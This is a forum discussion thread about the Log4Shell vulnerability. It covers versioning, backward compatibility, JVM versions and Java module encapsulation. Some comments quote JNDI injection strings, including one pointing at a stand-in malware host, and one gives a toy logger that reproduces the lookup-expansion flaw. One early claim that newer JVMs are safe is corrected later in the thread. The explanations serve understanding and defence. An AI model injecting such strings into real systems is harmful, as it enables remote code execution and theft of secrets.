This assumption isn't true, though. APIs routinely get changed in minor versions, which can make it non-trivial to upgrade large codebases that use lots of features.


If breaking changes on an API are made in minor versions then they're not actually following semantic versioning.. and that's by choice.


Yes, they never claimed to be using semantic versioning so the assumption that they were using it is wrong.


> use lots of features.

That's the problem, you use log4j to log. Any 'feature' outside of that being used is wrong. Any 'feature' outside of that being implemented, is wrong.

If JNDI string interpolation is desired, write another module that does that.

I hate 'is-odd' but this is another extreme, and demonstrably worse.


They put themselves between a rock and a hard place by burning the major version number into the name of the library.

Changing the major version number as long it's accompanied by a well written release note on what needs to change seems fine.


I doubt anyone would have demanded retention of a feature where log _payload_ could cause the library to punch a connection to a server specified in the payload then _execute_ the response for any reason, never mind backwards compatibility.


If you had to have such a feature, it should never have been on by default, and the servers to be contacted should've been in a whitelist somewhere at a minimum.
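A hedged sketch of what that minimum could look like (the host names, class names, and methods here are illustrative, not anything log4j ever shipped): parse the host out of the JNDI URL and refuse anything not explicitly opted in.

```java
import java.net.URI;
import java.util.Set;

public class JndiAllowlist {
    // Opt-in by the operator; an empty set would deny everything by default.
    private static final Set<String> ALLOWED_HOSTS =
            Set.of("ldap.internal.example.com");

    static boolean isPermitted(String jndiUrl) {
        try {
            String host = URI.create(jndiUrl).getHost();
            return host != null && ALLOWED_HOSTS.contains(host);
        } catch (IllegalArgumentException e) {
            return false; // malformed URL: refuse
        }
    }

    public static void main(String[] args) {
        System.out.println(isPermitted("ldap://ldap.internal.example.com/cfg")); // true
        System.out.println(isPermitted("ldap://attacker.example/a"));            // false
    }
}
```

Even this wouldn't make the feature a good idea, but it would have reduced "any string that gets logged" to "strings naming hosts the operator already trusts."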


*allowlist


By the way, when was the last time we experienced such catastrophic bugs in Python/Erlang/Ruby/Go... libraries? I think simplicity is deeply interconnected with security. Perfection comes from simplicity, and the choice of programming language can and will affect the security of your platform. Although I have to admit, bad engineering and overuse of libraries can happen in any environment, but Java technologies are unnecessarily complex compared to other tech stacks.


10 years ago, with DoS attacks using hash-table collisions [1]. It was a sad Christmas; lots of RoR servers to patch.

[1] https://www.securityweek.com/hash-table-collision-attacks-co...
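For reference, the collision trick mentioned above is easy to demonstrate in Java itself: String.hashCode uses a fixed polynomial, so attacker-chosen keys can be made to collide at will, and collisions compose into exponentially many colliding keys.

```java
// String.hashCode() is h = s[0]*31^(n-1) + ... + s[n-1], so any two-char
// pairs where c1*31 + c2 are equal collide: 'A'*31 + 'a' == 'B'*31 + 'B' == 2112.
public class HashCollision {
    public static void main(String[] args) {
        System.out.println("Aa".hashCode() == "BB".hashCode());     // true
        // Collisions compose: 2^n colliding keys of length 2n.
        System.out.println("AaAa".hashCode() == "BBBB".hashCode()); // true
        System.out.println("AaBB".hashCode() == "BBAa".hashCode()); // true
        // Send thousands of such keys as request parameters and a naive
        // hash table degrades to O(n^2) insertion - the 2011 "hashDoS".
    }
}
```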


When a Javascript logging package has a vulnerability: "Why do you need a package for something so basic as logging? This should be part of JS core lib, or just roll your own."

When a Java logging package has a vulnerability: Sober introspection about the role of maintainers, dependencies, and backward compatibility in the OSS ecosystem.


Honestly speaking, nobody should be surprised by this. Javascript on the server is a daft pursuit, and shops that rely on it are continuously rolling the dice on their uptime anyway. Anyone can release a NodeJS package, and anyone can pick it up as a dependency.

Which is nominally true for Java. But Java enjoys the advantage of maturity. These things are supposed to have been foreseen. Java projects have a lot more resources thrown at them by their orgs, and there is a great deal of talent out there making sure all of this stuff is reliable.

This... caught that whole ecosystem off guard. Javascript devs have to always be on guard, because Javascript is the wild west. Nobody blissfully using and loving Javascript really understands why Javascript has so much trouble coming up with a standard library, but anyone who gets deep enough into Javascript understands very painfully why you just can't rely on it like you can on Java.

Nobody starts asking sober, realistic questions when Javascript breaks because Javascript is always breaking.


There are different times, though. If you're going to roll a service in server-side Javascript at a large organization nowadays, it'll be tested to high heaven with modern CI/CD and rolling deploys, and this mitigates the fragility of applying security (or any other) updates significantly.

With Java, though, a lot of the services in production were made before this maturity was standard. There's a vast amount of software out there that's insufficiently tested and documented, some of which has dependencies as jar files included directly in the filesystem, and the relative stability of the Java library ecosystem led to a feeling that this was acceptable. It's difficult to even detect vulnerable services, much less upgrade them and trust CI to have your back. The reason this CVE is insidious is because it uniquely affects legacy software, often many layers removed from web interfaces, that was thought to be battle-tested.


Absolutely awful attitude to have. Javascript is not always breaking. Blaming failures of libraries on the language itself is ridiculous. Literally JS on the server is no more vulnerable to downtime than other langs.

Which is why it's just as stupid to be angry with Java regarding this.


Get far enough in your career and you realize ecosystems and history, and yes, language dynamics, matter. Javascript never had a module management system. It never had anything close to a strong type system. (at least python and ruby have strong type systems) All these things have to be grafted onto the language later and if you can understand the tyranny backwards-compatibility places a language under, you can understand the plight of NodeJS.

Don't get me wrong, NodeJS is improving... by implementing Ruby features.


> It never had anything close to a strong type system

Well yeah. It never claimed to have one.

You're blaming an ecosystem for being unstable, which while I agree, ultimately has nothing to do with the lang itself.

The fact that we're discussing how one of the simplest libs of a language (logging to the console) can have such a widely felt exploit in such a 'mature' lang makes your entire point very ironic.


> You're blaming an ecosystem for being unstable, which while I agree, ultimately has nothing to do with the lang itself.

It has everything to do with the language. With no built-in module support (until recently!) and a weak type system, it's virtually impossible for Javascript to get anywhere near the stability of Java.

> makes your entire point very ironic.

OP made an observation that we're having this conversation for this particular Java vuln but Javascript breakage never provokes anything like this. I don't understand where the irony is. <insert-Princess-Bride-gif>


These aren't conflicting beliefs. It's perfectly reasonable to believe that JavaScript has an inadequate standard library and recognize that other ecosystems can have dependency issues.


Yeah but one uses npm and the other maven.


So it's all glass houses?


Quite a reach going from the typical mockery of JavaScript, which mostly refers to the left-pad fiasco, to saying logging is expected as a core library. No language I've used so far has had a built-in logging library that was useful in every project.


> This is where software goes wrong the most for me. I want, year after year, to come back to a tool and be able to apply the knowledge I acquired the last time I used it, to new things I learn, and build on it. I want to hone my craft by growing a deep understanding of the tools I use.

This resonates with me deeply. Mastery of any subject needs a level of stability and permanence so that a skill base and a knowledge base doesn't erode away over time. Change is that erosive force, and we're so bad at knowing what changes to make in the software world.


> but complaints would have bubbled up to the Apache umbrella organization, which no doubt has plenty of Words written about "proper" versions, and the letter of rules would have been used to add heavily to their burden, while the spirit of compatibility is ignored.

Tailscale is wonderful software, but with all due respect I don't think David has much experience with Apache Foundation or Eclipse Foundation projects. I am a project lead of one (way smaller) Eclipse Foundation project and keep a close watch on another (bigger, but nowhere near the log4j scale) Apache Foundation project. We are free to make breaking changes (and make them we do). In both Foundations, there is a Project Management Committee that signs off on releases. They would normally raise an eyebrow if you try to push a breaking change into a patch release, but their reaction would normally be "why don't you bump the major version?".

Edit: there is indeed a social contract between the project leadership and the users. We have a social contract of supporting the oldest possible JVM for our project. Now some of our dependencies (guess what, that ASF project!) dropped Java 8 support and published a few CVEs since and we are going to move to JDK 11 as a baseline soon. Yes, some users are grumpy but people understand that unless someone forks that ASF project and starts backporting CVE fixes, we got to make the move. Bottom line: it's a much more social process than a bureaucratic one.


Hello. You're right that I have little experience with them, I've submitted code but never run a project. I believe I misread some commentary to convince myself of this. Paragraph removed. Thanks!

I suspect there is some kind of cultural pressure somewhere. Perhaps some of that comes from the versioning system: the maintainers are convinced they can't remove a feature without bumping a major version, and simultaneously convinced that bumping the major version number requires a lot of work for others that they don't have time to do? I believe neither statement should be true in reasonably run open source.


>but complaints would have bubbled up to the Apache umbrella organization

Like a thrown exception.


Sure, people who are making money building on FOSS tools should understand that they bear the burden of fitness for their environment. Maybe they do. If so, they've done a good job of deflecting attention.

Let me tell you a story about something that happened to me this spring. I had trouble logging in to my customer account at a critical infrastructure provider (utility provider). When I called customer support one thing led to another and they ended up reading me my password from their internal systems. (Let that sink in.)

So I spent a week trying to get ahold of someone to let them know how fucked up that is, which they avoided, until ultimately they claimed I was "threatening" them. I reached out to the "hidden hand" of the internet, did anyone have contacts with their MSP (with "National" and [edit: changed from "Infrastructure"] "Information" in the name)? But nobody did, so someone whose name would be recognized offered to tweet it.

Didn't take long to hear from MSP's Chief Cloud Architect. The story that they tell is that they'd like to turn the feature off but the customer won't let them.

Discuss.


The last part advises being feature-conservative to avoid promises altogether. For that, look to enterprise software, where backwards compatibility is a legal agreement. This carries a bunch of alternative issues.


"Features" is a way too abstract thing to blame, tbh.

The elephant in the room here is the excessive dynamism allowed by default on the JVM platform. How many applications actually need fancy classloaders? Why isn't every step to get there - "loading a class from anywhere that isn't my JARs", JNDI, JNDI's LDAP backend, etc. - an explicit opt-in flag to the VM? Java's wide-open defaults are what made the blast radius of this huge.


Java's dynamic classloaders were one of its original tantalising features: you could have code from one place running somewhere else - "agents" could literally send their bytes to a device, execute there, and then erase themselves when they were done. It sounds crazy these days, but it was all meant to be held together by the security model. Built in at the core, it was safe to let foreign bytecode execute locally because the completely managed VM could enforce a security sandbox that allowed the code to do only exactly what it was meant to.

In some ways that is where this and all those features fell down ... if log4j had constrained those classes within a security sandbox it wouldn't matter what they did. But nobody understands or uses Java security permissions. The whole system is byzantine and drives people crazy whenever they do run into it. But if it had worked you could be asking the question, "why did log4j allow the permission for the remote code to do bad things" rather than "why was remote code allowed to execute".


There are popular languages that have `eval()`, so why blame Java alone?


Don't get us wrong, eval() is terrible too.


Meaning that Log4j is certainly not the only library to have the problem - maybe just the one with the largest footprint. What about JSP?


[flagged]


The original is understandable. The person might not be a native speaker and calling their grammar "questionable" is too harsh, especially on an online forum. Also I don't think some of your "fixes" are necessary or meaningful.


[flagged]


Using semicolons to join sentences together isn't a super common style of writing for online comment sections. If you are unable to read a paragraph composed of shorter, more discrete sentences, that's on you.


> I attempted to fix your questionable grammar as[sic] to make your writing easier to understand

Muphry's Law strikes again! I think you meant "...so as to make..."

(+1 to the other reply - the original was perfectly readable)


Ideally you’d just remove the word ‘as’ for the most concise and correct sentence.


I have used logging all my life (2 decades career) and even log4j at times, but I can’t remember ever logging any messages that were expanded by the logging runtime (rather than at compile time or by the language runtime). Have I been missing out on anything important? Of course the configured log pattern is expanded like log level and date, but if I understand correctly this expansion can take place in log messages?


Yes — simple pattern expansion is pretty handy. For example:

    log.debug("Added {} records", added.size());
In this example, the cost of string concatenation / interpolation can be avoided when debug-level logging isn't enabled, which is a lot cleaner to read than surrounding all the detailed logging with "if (log.isDebugEnabled())" checks.
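A minimal sketch of why the parameterized form is cheap when the level is off (this is a made-up stand-in, not the real Log4j/SLF4J API): the level check happens before any message string is built.

```java
// Illustrative stand-in for a logging facade; NOT the real Log4j/SLF4J API.
class SketchLogger {
    private final boolean debugEnabled;
    int stringsBuilt = 0; // counts how many messages were actually formatted

    SketchLogger(boolean debugEnabled) {
        this.debugEnabled = debugEnabled;
    }

    // Parameterized logging: the level check runs first, so the message
    // string is only assembled when debug logging is actually on.
    void debug(String pattern, Object arg) {
        if (!debugEnabled) {
            return; // cheap early exit: no concatenation, no formatting
        }
        stringsBuilt++;
        System.out.println(pattern.replace("{}", String.valueOf(arg)));
    }
}
```

Note that with debug off, the argument expression (e.g. `added.size()`) is still evaluated at the call site; the saving is in skipping the string assembly, which is the cost being described here.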

I agree that the more complex expansions that log4j evolved to support are of pretty marginal use. The oft-cited examples — context information — are IMO better added as additional fields in the log record than developer-interpolated strings.


>simple pattern expansion is pretty handy. For example: [...] added.size()

I think you misunderstood the gp's scenario question. Your example of "added.size()" is static code that was written by the friendly programmer and evaluated at the call site by the language runtime. We do expect that baseline functionality as reasonable, and gp wasn't asking about that.

Instead, what folks are wondering about is dynamic and recursive template expansion of 2nd-parameter strings at runtime supplied by potential hostile adversary such as:

  log.debug("Added {} records", sAdversarialUserSuppliedString);
... and sAdversarialUserSuppliedString itself has an embedded "${...}" lookup with evil contents such as "${jndi:ldap://malware.net:1234/runviruscode}"

With that extra power and "convenience" provided by log4j, it becomes a backdoor "eval()" for arbitrary user-supplied code.

The gp's question restated could be: "Who legitimately needs that type of runtime template expansion in the 2nd parameter of sAdversarialUserSuppliedString and what have I been missing by not needing to do that? I seem to have gotten by on just using template expansion only in the 1st parameter."
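A hedged sketch of the misfeature being described, with a toy lookup table standing in for Log4j's real resolvers (jndi:, env:, and so on; all names here are illustrative). The flaw is that expansion runs over the merged message, so `${...}` sequences inside the user-supplied argument get resolved too:

```java
import java.util.Map;

// Toy logger that, like vulnerable Log4j versions, re-scans the fully
// formatted message for ${...} lookups. Not the real Log4j implementation.
class NaiveLookupLogger {
    private final Map<String, String> lookups; // stand-in for jndi:, env:, etc.

    NaiveLookupLogger(Map<String, String> lookups) {
        this.lookups = lookups;
    }

    String render(String pattern, String userArg) {
        // Step 1: substitute the user-controlled argument into the message.
        String message = pattern.replace("{}", userArg);
        // Step 2 (the bug): run lookup expansion over the merged result,
        // so ${...} inside userArg gets treated as a trusted lookup.
        int start;
        while ((start = message.indexOf("${")) >= 0) {
            int end = message.indexOf('}', start);
            if (end < 0) {
                break; // unterminated lookup: leave as-is
            }
            String key = message.substring(start + 2, end);
            message = message.substring(0, start)
                    + lookups.getOrDefault(key, "")
                    + message.substring(end + 1);
        }
        return message;
    }
}
```

With `lookups = Map.of("secret", "hunter2")`, calling `render("Added {} records", "${secret}")` yields `Added hunter2 records`: the attacker-controlled second parameter was evaluated. That is the backdoor-`eval()` behavior described above; in real Log4j the embedded lookup could be `${jndi:...}`, which reaches out to a remote server.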


Yes, and I think that both your example of expansion and the milder `log.debug("Added {} records. Build: ${buildId}")` (in which the logging infra evaluates "${buildId}") are bad, and mis-features in a logging infrastructure.


Exactly, my question was basically that: what scenarios are there that we need the logging to expand, that can't be expanded at the call site? The usual ones are e.g. the date and time (which are popularly set in some logging pattern like %date %loglevel %message). But beyond that, why would I need the logging infra to expand anything in the message portion?


Yes that expansion I use of course. But that’s what I meant by by the language runtime, e.g the log(String msg, object[] args) is merely used as an alias for log(String.format(msg, args)).


Gotcha. The difference is important, since a good log framework won't simply delegate, but will first check that the log level is enabled. This often matters, if there are any log statements in high-cardinality loops, since the memory pressure of creating all the strings adds up, but the trivial stack frames can often be optimized away / trivialized, depending on the language, runtime, etc.

I used to be a big believer in doing manual log-enabled checks, but man, does that make the code noisy. I still do that when I want to log something non-trivial to compute, but that's the exception, not the rule.


How we visualized and fixed runtime exposure due to vulnerable Elasticsearch, using ThreatMapper

https://deepfence.io/cve-2021-44228-log4j2-exploitability-an...

https://github.com/deepfence/ThreatMapper


> Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns.

Does log4j not utilize a versioning scheme that has the notion of "breaking changes"? Anyone following semver, for example, could simply release a major to do away with an extremely troubling, and apparently well-known, back compat issue. Sounds like folks are right to criticize for poor decision making.


  > I want to be able to build knowledge of the library over a long time, to hone my craft.
This is my problem not only with programing languages but also with desktop environments and other tools. It's actually why I see people preferring LibreOffice Writer over MS Word in some fields, and why some people stick with e.g. PHP when NodeJS or Python would, in a stable world, be the objectively better technology.


I can't help but wonder: how can we ever tell whether this kind of vulnerability in an open source library is an accident of feature creep or simply incompetence?

What if this is a deliberate backdoor introduced by a third party? I bet there are a lot of groups out there that would give an arm and a leg to have had knowledge of this vulnerability for the years it was out there in log4j.


Completely understandable critical point on why "backward compatibility" means so much. I remember submitting a bug report and a pull request in the Amazon SES SDK library for .Net that basically fixed an issue when trying to send an attachment to anyone in the BCC field, just to be told it couldn't be done since it would break backward compatibility...even when the feature itself was broken....



Isn't there a middle ground?

You can get the "safe" non-backwards-compatible update as free/open source, or you can pay for updates that retain backwards compatibility.

There is already a model for this, where companies will pay for support for old versions of software that have been declared EOL and no longer getting "free" updates. Microsoft offers this for older Windows NT versions, for example.


This could have been solved by just making the unsafe behavior opt-in via a command-line flag. Right now it is opt-out.
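For reference, the opt-out that did exist (from Log4j 2.10 onward) was a JVM system property / environment variable; the point above is that the default polarity was backwards. The actual knobs, for anyone stuck on those versions (verify against your specific release):

```shell
# Disable message lookups globally (Log4j >= 2.10):
java -Dlog4j2.formatMsgNoLookups=true -jar app.jar

# Or via environment variable:
LOG4J_FORMAT_MSG_NO_LOOKUPS=true java -jar app.jar
```

The same effect can be had per-appender with `%m{nolookups}` in the pattern layout.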


So how would you know if a feature is safe enough to keep around ?


Can someone explain exactly what bad thing someone can do with this exploit?

I understand passing a data to a second server and being able to exfiltrate environment vars. (Environment vars are evil.) But I feel like I’m missing a step. How does this let someone take over a machine? How can attacker upload and run their own binary that can actually do real damage?


It lets the attacker take over the machine because certain strings in log messages are interpreted as (IIUC, I am not a Java engineer) lookups, and you can express a remote URL to load a class from (through something like a ${jndi:ldap://...} URL), resulting in fetching code from somewhere and running it, in the service of writing a log message. This is apparently being exploited in the Minecraft ecosystem by simply writing chat messages containing the full exploit, which gets executed by both servers and clients.


By my understanding, the RCE part of the exploit should not apply to recent Java versions if the default options are used (Minecraft shipped an older version afaik, and all bets are off for unmaintained enterprise applications).

The data extraction, however, will work on any Java version if the server in question can connect to a server under the control of an attacker, as the network request will be performed even if the JVM options that should avoid the RCE are enabled. Big problem for client applications (as usually most outgoing connections are allowed).

It's a bit harder to evaluate the impact in the enterprise context, as many companies will not allow their servers to connect to "random" endpoints, or at least require target-specific proxies to connect to the internet/intranet, which makes this harder to exploit.


> resulting in fetching code from somewhere and running it

Ahhh ok. I didn’t realize the service would fetch and execute. Yikes.


You can execute arbitrary code on someone's server. You gain full control of whatever the user running the application is allowed to do.


Compare the shifting sands of Swift with the stability of awk.

That is not a good comparison.


Just keep rce for backward compatibility. Many poor users rely on it. Also the devs should refuse to fix this without gettin paid.


But who wanted this feature for “backward compatibility reasons”?


The thing is, with such a large footprint you would have little desire to deal with "this release broke my application" tickets that would each require hours of attention before finding out which removed feature broke the user's case.


Then don't deal with it.

It's free software without any warranty. No one is under any obligation to make any user happy.


Keeping the feature around is also a way of not dealing with it.


I just noticed that my Ubiquiti Dream Machine Pro's IPS feature (which is just Suricata) was just updated to block this attack.


How do you know what the UDM IPS does/does not block? Is it displayed somewhere? Is it updated at a different cadence to the firmware/software updates?


But the issue was also fixed in all recent versions of JVMs. So it is only an issue on "old" versions - right?


That's incorrect: while the LDAP portion of this problem is mitigated in new JDKs, there are other attack vectors like RMI. It's by far the easiest to exploit and most severe vulnerability I've ever seen.


Do you have a source for that?



As they mention, these are custom examples where you perform a lookup on a user-supplied string. But do you have an example of that? It seems highly unlikely that anyone does JNDI lookups based on user input.


${jndi:rmi://localhost:1099/ObjectName} will do the lookup to the RMI server for ObjectName.


I get that this is a big deal (any remote code execution that is prevalent is a big deal).

But one thing that I haven't seen mentioned enough is that this only affects pretty old versions of java.

From https://www.veracode.com/blog/security-news/urgent-analysis-...

    JVM version - if lower than:
        Java 6 – 6u212 (java6 first released in 2006, this version appears unreleased?)
        Java 7 – 7u202 (java7 first released in 2011 this version appears unreleased?)
        Java 8 – 8u192 (from 2018)
        Java 11 - 11.0.2 (from 2019)
The current version of Java is 17. Anything running on 17 or 16 (the previous major release) isn't vulnerable.

Now, I get that major version upgrades are a hassle, but I haven't seen anyone address the "hey, you should have upgraded" elephant in the room.

(All java release dates from https://www.java.com/releases/ )


> But one thing that I haven't seen mentioned enough is that this only affects pretty old versions of java.

Please stop repeating this. The only attack that won't work on newer JVM versions is the one based on the LDAP server returning an ObjectFactory that redirects to a class file based on another remote HTTP server. However, that's absolutely not the only attack vector. LDAP itself has other attacks that are possible, and there are other JNDI integrations that also have different attacks, amongst other things, related to Java serialization (and once you can de-serialize bytes on someone's JVM, you have a smorgasbord of attack vectors to play with).

If your log4j version is resolving JNDI strings, you are NOT SAFE regardless of which JVM version you're using.


I wish your comment would get higher visibility.

To clarify, the vulnerability would make it possible to post server environment variables to any remote server, regardless of JRE version. That could easily end up being as catastrophic as an RCE.
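To make that concrete: the widely reported exfiltration pattern nests an `${env:...}` lookup inside the JNDI URL, so the secret becomes part of the DNS/LDAP request the victim's JVM makes (the attacker hostname and variable name below are illustrative):

```
${jndi:ldap://attacker.example.com/${env:AWS_SECRET_ACCESS_KEY}}
```

The inner lookup is resolved first, and the resulting value leaves the network in the outbound request even when no class is ever loaded.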


Yeah, that's a disaster; many applications/pods/docker containers store secrets in the environment. Even if it doesn't expose the service from the outside due to firewalls etc., it's a(nother) way in for malicious internal users (who I believe account for a large portion, or the majority, of breaches).


Indeed. Anything which exposes a program’s environment to other non-root programs which are not sub-processes should be considered a security bug.


> the vulnerability would make it possible to post server environment variables to any remote server, regardless of JRE version.

I've been able to achieve RCE as well by still using LDAP, but a different lookup mechanism (if you learn about LDAP, you'll quickly realize there's several ways to do this). RCE does not require remote class loading, that's just the easiest way to achieve it.

If your JVM triggered the evaluation of any unsafe jndi string, you should assume an RCE is very likely possible on your environment.


Thanks. I can't edit my comment but I upvoted yours.


Hmm, why can't you edit your comment? There is an edit button on Hacker News.


The button is available only for a time window (2h?) after the submission.

Which makes sense, on a message board (which HN is) the feature is mostly supposed to allow quick fixes over minor errors, not retroactive editorial work.


It's a big deal because most large users of Java aren't actually using the newer versions. It's very hard to source that claim, and I apologize for the lack of hard data, but in my experience with "enterprise Java", it's almost all still Java 11, or even Java 8.

Some lame anecdotes:

Minecraft ships with a bundled version of Java 8. Most linux distributions still default to Java 11, and you have to explicitly ask for newer JDKs. Some distributions, like Void Linux, still only package Java 11. Many enterprise applications don't even use the system Java environments, and package their own outdated version of Java, sometimes in /opt, sometimes in their installation directory on Windows.

(edit: to this point, Minecraft apparently ships with 1.8.0_51 from 2015, and I'm sure I've seen similar with some Java applications at work. I imagine for programs that aren't servers listening on the network, the threat of exploitation seemed lower, and there was less of a (perceived) need to update even the version of Java. If it ain't broke, don't fix it, and all that.)

Regardless of the fact people should upgrade to newer Java versions, the reality is (IME) they ... haven't. And so many (very large!) corporations are relying on vulnerable versions of Java, which is why this is such a big deal.


The reason that most distributions only packaged Java 11 until recently is actually very simple: it was the current "LTS" version, which had a longer support window. So companies won't usually jump into Java 12, or 13... because it meant you had 6 months until that release would be considered unsupported.

That's why Java 11 has been receiving updates (latest one, 11.0.13, dates from October 2021) while Java 12, for example, got its last release (12.0.2) in 2019.

Now that Java 17 (released two months ago) is the new Java LTS version, you could expect most distributions to package it. For example, Ubuntu has been offering Java 17 for a couple of months.


Sure, and it's supported by more software than the newer versions (edit: because this wasn't clear, I mean I think the default JDK will remain 11 for a while, even on distros that package newer). The newer versions have been making a fair number of backwards-incompatible changes, which seems to have discouraged adoption. I'm not a Java developer, so I don't really have personal experience or frustration with it, but it seems like I read "x was deprecated, then dropped, in versions <x>, <y> of Java" a lot - changes that would require pretty sweeping rework of codebases that relied on the old behavior/features.

A lot are still stuck on 8, and aren't even compatible with 11, much less 15 or 17. I think VMWare's vCenter software still uses Java 8 internally...


Yeah, that's the biggest problem: a complex web of dependencies on old legacy applications built using JDK 8/11, not so much any language changes. Sometimes there's just no option to upgrade - e.g. companies stuck on Oracle 12 can only use Flyway 5.1.4, which rules out Spring 2.5.x, and so on.

Many libraries will eventually drop support for older JREs, and then you're left with a big-bang approach, having to upgrade everything to the latest version - and that may include changes in the servlet/REST/etc. specs, which can be a bit overwhelming for large legacy codebases.

It's why tools like Dependabot are so important imo; they keep you up to date in incremental steps if you're vigilant, rather than letting the POM/build.gradle ossify over time.


> in my experience with "enterprise Java", it's almost all still Java 11, or even Java 8.

IMO, this is entirely Oracle's fault, for ramming through modules and --add-opens requirements starting in Java 9 that broke almost everything for no good reason.


add-opens was only required starting in 17, and modules, whose encapsulation wasn't even on by default until JDK 16, had little if anything to do with the migration issues from 8 to 9. They just happened to be 9's most famous feature, so they got the blame. Nearly all migration issues were due to libraries bypassing the Java spec in 8 and relying on internal implementation details, essentially becoming intentionally non-portable. Some of them had a good reason to do so, but nevertheless, that's what happened. Java 9 was one of the biggest Java releases ever, internal implementation details changed all over the JDK, so many libraries that had become tied to 8 broke. Now upgrading is no longer too big a deal because all popular libraries have long been fixed.

Modules, however, are related to those issues in that now when their encapsulation has finally been turned on (in 16 and 17), they will do their job of preventing this problem of bypassing the spec from recurring (the application is able to grant internal access to a library, but at least it knows there might be a potential maintenance and/or security issue to keep an eye on when it does).


I have personally migrated (or overseen the migration of) many projects from Java 8 (and even Java 6) to Java 11.

Modules in Java 9 were a bit controversial back then, so I guess that's the reason we hear a lot about it, but I haven't encountered an issue related to modules even once.

Most of the migration work that was needed was just upgrading libraries, or adding new dependencies for Java EE APIs that moved out of the JDK.

And why were libraries incompatible? Relying on undocumented internals is one thing, but the funny thing is that a surprisingly large number of libraries broke because they relied on the format of the Java version string. When it changed from 1.8 to 9.0, they suddenly saw a "Java Version 0" and didn't know what to do with it.
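The breakage is easy to reproduce. A sketch of the classic parsing bug (hypothetical helpers, not from any real library): code written for the `1.x` scheme grabs the component after the first dot, which was the major version under `1.8.0_192` but became the minor version once the string started at `9`:

```java
class VersionParsing {
    // The pre-Java-9 idiom: assume "1.<major>.<rest>" and read parts[1].
    static int naiveMajor(String version) {
        String[] parts = version.split("\\.");
        return Integer.parseInt(parts[1]); // "1.8.0_192" -> 8, but "9.0.1" -> 0
    }

    // A scheme-tolerant fix: strip an optional "1." prefix, then take the
    // leading component. (Java 9+ code can just use Runtime.version().)
    static int robustMajor(String version) {
        String v = version.startsWith("1.") ? version.substring(2) : version;
        int dot = v.indexOf('.');
        return Integer.parseInt(dot < 0 ? v : v.substring(0, dot));
    }
}
```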


> When it changed from 1.8 to 9.0, they suddenly saw a "Java Version 0" and didn't know what to do with it.

That's true. That change was probably the biggest single "breaking change" in that release.


My complaint about the --add-opens fiasco is that it was basically a breaking change for the sake of being a breaking change, rather than one that was necessary to fix some bug or add some feature.

> they will do their job of preventing this problem of bypassing the spec from recurring

This feels like curing cancer by killing the patient.


> My complaint about the --add-opens fiasco is that it was basically a breaking change for the sake of being a breaking change, rather than one that was necessary to fix some bug or add some feature.

add-opens, which, again, has been required only since JDK 17, is absolutely essential for Java's security (it is impossible for any Java code to make any strong guarantees without it), and to prevent the kind of problems we've seen when migrating from 8 to 9. The only thing it breaks is the ability to write non-portable libraries without the application knowing about it. There is not a single line of code that would be affected by it that wouldn't have also been susceptible to any change in internal details, which can happen in any release without warning. Since the amount of internal implementation detail is only going to grow with the growing investment in Java, this change helps warn against potential issues due to non-portable code.

> This feels like curing cancer by killing the patient.

JDK 17 adoption is pretty impressive (and faster than 11's). Doesn't seem like the patient is dead.


> add-opens [...] is absolutely essential for Java's security (it is impossible for any Java code to make any strong guarantees without it

How do you figure? What kinds of guarantees?

> to prevent the kind of problems we've seen when migrating from 8 to 9

But it only prevented it from happening later by making it happen now! There's a good chance that most of the programs broken by modules would never have broken otherwise.


> How do you figure? What kinds of guarantees?

Any, but specifically around security (almost all security is provided by certain preconditions being met, namely that method foo() is called only immediately after ensuring that method bar() returns true, or that an object of type Baz is always initialised in a certain way).

Prior to modules, the meaning of any line of Java code anywhere -- including in the JDK itself -- was subject to change by any other line of code in any loaded library through various kinds of monkey patching. You could not guarantee anything. With modules, if `foo` is private, and the only call to it is in `if (bar()) foo();` you can guarantee that foo is only called when bar is true.

Now, strong encapsulation isn't airtight yet, and there are still some loopholes left to let straggler libraries catch up or because there aren't replacements to some unsafe operations yet, but it will be very soon.

> There's a good chance that most of the programs broken by modules would never have broken otherwise.

First, almost all problems migrating to 9+ were because of such non-portable code, and the disruption was quite significant, and the rate of internal change is increasing. Second, this makes it happen now instead of happening, perhaps on a smaller scale, at each and every release for the next decades.


> Any, but specifically around security

Ah, so they had to add it because they plan on removing the security manager API. So it is a breaking change for the sake of another breaking change.


The Security Manager API hasn't been an important Java security feature for many years. It was a security feature for Applets, and over the past decade it's been used by a few applications mostly for monitoring/toy sandboxing. In any event, a vanishingly small number of applications use it. Strong encapsulation is part of a long-term effort to make Java more secure, as threats are changing.

Also, encapsulation isn't a breaking change. Java's strong backward compatibility commitment is with respect to the Java SE specification. No APIs are affected. It's only internal classes that have always been subject to change, and with clear warnings that they must not be accessed, that are encapsulated.


Are Python, Ruby, and Lua all inherently insecure? Why do so many programs that care about security use them? They all allow monkey patching, after all.


Obviously, Java is used for much more critical applications than Python, Ruby, or Lua, but I don't know enough about their security strategy. Just as Java's performance is constantly being improved, so does its security.


What language besides Java has a "feature" that requires a whitelist to use reflection, that you can't just say "everything" for? Or is Java the only secure programming language that exists?


Strong encapsulation isn't a whitelist for reflection. It forbids the turning off of access control by arbitrary libraries (you do know that even before modules you had to explicitly setAccessible if you wanted to break through access control) -- unless the application explicitly allows it. Some languages don't have reflection at all, and among those that do, Java is clearly the language that is by far most popular for serious business-critical applications.


> you do know that even before modules you had to explicitly setAccessible if you wanted to break through access control

Yes, I do know that, and I'm fine with it. If it still worked then I wouldn't mind modules. My complaint in particular is that a command line whitelist is needed for setAccessible to work anymore.


Right, but the command-line is intentional: it is intended to make the application aware of potential maintenance and/or security issues, and setAccessible is really a potential maintenance and/or security issue. The only argument against it would be the desire to allow libraries to impose such risks on applications without the application knowing about it. I understand why some library authors would not like their users to know their libraries pose such a risk, but obviously the applications should take precedence.


My issue isn't that it needs a command line parameter. It's that you need to create a whitelist that enumerates everything that anything is going to use individually. I'd be fine with modules if --add-opens had a "let this module reflectively access everything" wildcard, or if --illegal-access=permit were never removed.


But that wouldn't express what the potential issue is. You want to know which modules' internal changes could break you, and/or in what way you're expanding the security attack surface. Such a library needs to tell you what "bad" things it does and give you a list of modules whose encapsulation it breaks open, which you could put on the command line.
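For concreteness, the command-line grants being discussed look like this (the module and package names are just examples of what a library's documentation would tell you to add; `ALL-UNNAMED` means "any code on the classpath"):

```shell
# Open java.base's java.lang package to everything on the classpath:
java --add-opens java.base/java.lang=ALL-UNNAMED -jar app.jar

# Or grant access only to one named module:
java --add-opens java.base/java.util=com.example.somelib -jar app.jar
```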


At any moment, Oracle could change the package names of all internal code from `com.sun` to `com.oracle` or to have a randomized prefix, which would break all those programs as well.


